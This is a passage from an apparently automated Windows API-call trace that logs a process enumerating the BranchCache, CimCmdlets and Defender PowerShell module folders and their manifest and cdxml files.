nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.712] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.713] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.713] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0264.713] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0264.751] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.751] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.752] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0264.752] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0264.752] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0264.753] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.753] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0264.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.754] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0264.754] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0264.754] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.754] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.754] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0264.754] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0264.755] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.755] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0264.755] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0264.755] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.756] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.756] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0264.756] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.756] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.756] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0264.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.756] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.757] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0264.757] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0264.757] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db080 [0264.757] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.757] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0264.757] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0264.758] FindClose (in: hFindFile=0x1a8db080 | out: hFindFile=0x1a8db080) returned 1 [0264.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.758] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0264.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.758] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0264.758] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0264.758] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.759] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.759] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0264.759] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0264.759] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0264.759] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0264.760] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0264.760] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0264.760] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0264.760] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0264.760] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0264.761] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0264.761] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.761] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0264.761] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0264.761] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.761] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, 